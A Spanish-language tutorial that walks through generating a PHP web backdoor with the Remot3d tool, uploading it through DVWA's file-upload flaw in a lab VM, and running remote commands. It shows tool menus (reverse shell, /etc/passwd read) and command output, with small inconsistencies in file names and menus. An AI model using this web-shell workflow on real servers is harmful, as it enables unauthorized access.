Construya su propio backdoor

Un backdoor es un malware que se utiliza para interrumpir la autenticación de cualquier sistema informático. Hoy en día, la mayoría de los ataques de backdoor están aumentando en las organizaciones. Un backdoor toma forma oculta en el programa y se puede diseñar y programar fácilmente, como se demostró en el curso de ethical hacking del Instituto Internacional de Seguridad Cibernética. Hoy le mostraremos un programa simple que se utiliza para crear backdoors fácilmente.

La herramienta Remot3d se utiliza en la creación de backdoors. Se trata de unas pocas líneas de código que se utilizan para atacar aplicaciones web php.

Atacante:

  • En el lado del atacante estamos utilizando DVWA para probar la herramienta. Para descargar DVWA iso vaya a: https://www.vulnhub.com/entry/damn-vulnerable-web-application-dvwa-107,43/
  • Después de descargar iso, abra iso en virtual box o vmware workstation. Entonces empieza iso
  • Para obtener DVWA escriba ip ifconfig. En nuestro caso, IP fue 192.168.1.105

Instalación:

  • Esta herramienta ha sido probada en Parrot OS 4.5
  • Para la clonación, escriba git clone https://github.com/KeepWannabe/Remot3d.git
  • Escriba cd Remot3d
  • Escriba ./Remot3d

          @@@@@@@   @@@@@@@@  @@@@@@@@@@    @@@@@@   @@@@@@@  @@@@@@   @@@@@@@
          @@@@@@@@  @@@@@@@@  @@@@@@@@@@@  @@@@@@@@  @@@@@@@  @@@@@@@  @@@@@@@@
          @@!  @@@  @@!       @@! @@! @@!  @@!  @@@    @@!        @@@  @@!  @@@
          !@!  @!@  !@!       !@! !@! !@!  !@!  @!@    !@!        @!@  !@!  @!@
          @!@!!@!   @!!!:!    @!! !!@ @!@  @!@  !@!    @!!    @!@!!@   @!@  !@!
          !!@!@!    !!!!!:    !@!   ! !@!  !@!  !!!    !!!    !!@!@!   !@!  !!!
          !!: :!!   !!:       !!:     !!:  !!:  !!!    !!:        !!:  !!:  !!!
          :!:  !:!  :!:       :!:     :!:  :!:  !:!    :!:        :!:  :!:  !:!
          ::   :::   :: ::::  :::     ::   ::::: ::     ::    :: ::::   :::: ::
          :   : :  : :: ::    :      :     : :  :      :      : : :   :: :  :
                        --------------------------------------
                           PHP REMOTE BACKDOOR - BY B1P0L4R
  [+] Options :   
└[-] 1. Generate Backdoor
└[-] 2. Generate Reverser Shell (with iMap Disable Function Bypass)
 └[-] 3. Bypass Read /etc/passwd (with unique logic)
 └[-] 4. Remote your Backdoor (Just for Option 1)
 ┌[+] Choose the options
└[root@indoxploit]:#
  • Arriba están las opciones que se usan para crear backdoors
  • Escriba 1
  ┌[+] Choose the options   └[root@indoxploit]:~# 1
       __----_
     /##|       \
    /###|     |  \______
   |####|               \
   |####|      ___   ___|©
   \####/     _____ /
     \###    /
     =====ÊšçØ      ╔═╗┬ ┬┌─┐  ╦═╗┌─┐┌┬┐┌─┐┌┬┐┌─┐      //
     /        \     ╠═╝├─┤├─┘  ╠╦╝├┤ ││││ │ │ ├┤      //
    |   |_      \   ╩  ┴ ┴┴    ╩╚═└─┘┴ ┴└─┘ ┴ └─┘    //  But it's useless !
    \___/      |    ╔╗ ╔═╗╔═╗╦╔═╔╦╗╔═╗╔═╗╦═╗        //      you can't control his heart
     \         /    ╠╩╗╠═╣║  ╠╩╗ ║║║ ║║ ║╠╦╝       //
      |    |__|__   ╚═╝╩ ╩╚═╝╩ ╩═╩╝╚═╝╚═╝╩╚═      //
      (______)___)  Version 2.0 - Stable
[+] Set Your Backdoor Name : backdoor.pbp
  • Luego escriba el nombre del backdoor: backdoor.php
  • Luego ingrese la contraseña: 123456
[+] Set Your Backdoor Password : 123456 
└[-] Success Generating Backdoor on /home/user/Downloads/Remot3d/backdoor.pbp
  • El backdoor se guardará en el directorio actual de Remot3d
  • Ahora es necesario que este backdoor.php se cargue en un servidor vulnerable, que en nuestro caso es DVWA. Usaremos la vulnerabilidad de carga en DVWA para cargar este backdoor.php
  • Para probar subir puerta trasera en DVWA. Ir al navegador y abrir dvwa. Escriba 192.168.1.105. Introduzca el nombre de usuario: admin y contraseña: password
  • Después de abrir DVWA, haga clic en Upload. Luego vaya a la ubicación de Remot3d y seleccione el archivo backdoor.php
  • Después de subir el archivo, vaya al terminal y teclee ./Remot3d
  • Escriba 4
[+] Options :    
└[•] 1. Generate Remote Backdoor
└[•] 2. Generate Reverser Shell (with iMap Disable Function Bypass)
└[•] 3. Bypass Server Firewall (with FUD Backdoor Script)
└[•] 4. Remote your Backdoor (Just for Option 1)

┌[+] Choose the options
└[root@indoxploit]:~# 4
  • Escriba la ubicación donde ha cargado Remot3d. Escriba https://192.168.1.105/hackable/uploads/backdoor.php
  • Escriba la misma contraseña que ha escrito al crear la puerta trasera
  • Escriba 123456
[ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++     ]
[!] Backdoor Alive… Processing for Connect
[+] Your Public IP : 47.5.27.25
[+] System Info :

Notice: Undefined index: pwd in /opt/lampp/htdocs/hackable/uploads/backdoor3.php on line 1

Linux dvwa #41-Ubuntu SMP Thu Aug 19 01:12:52 UTC 2010 i686 unknown GNU/Linux
[+] User ID :

Notice: Undefined index: pwd in /opt/lampp/htdocs/hackable/uploads/backdoor3.php on line 1

uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]
  • Teclear ifconfig
[+] COMMAND : ifconfig

Notice: Undefined index: pwd in /opt/lampp/htdocs/hackable/uploads/backdoor3.php on line 1

eth0 Link encap:Ethernet HWaddr 00:0c:29:33:5d:c2
inet addr:192.168.1.105 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe33:5dc2/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1035 errors:0 dropped:0 overruns:0 frame:0
TX packets:383 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:106710 (106.7 KB) TX bytes:267977 (267.9 KB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:68 errors:0 dropped:0 overruns:0 frame:0
TX packets:68 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:5440 (5.4 KB) TX bytes:5440 (5.4 KB)
  • Escriba ls y mostrará los archivos actuales en el servidor
[+] COMMAND : ls


Notice: Undefined index: pwd in /opt/lampp/htdocs/hackable/uploads/backdoor3.php on line 1

backdoor
backdoor2
backdoor3.php
backdoor4.php
dvwa_email.png
test
  • Ahora puede manipular  su objetivo, si el objetivo está por encima de la vulnerabilidad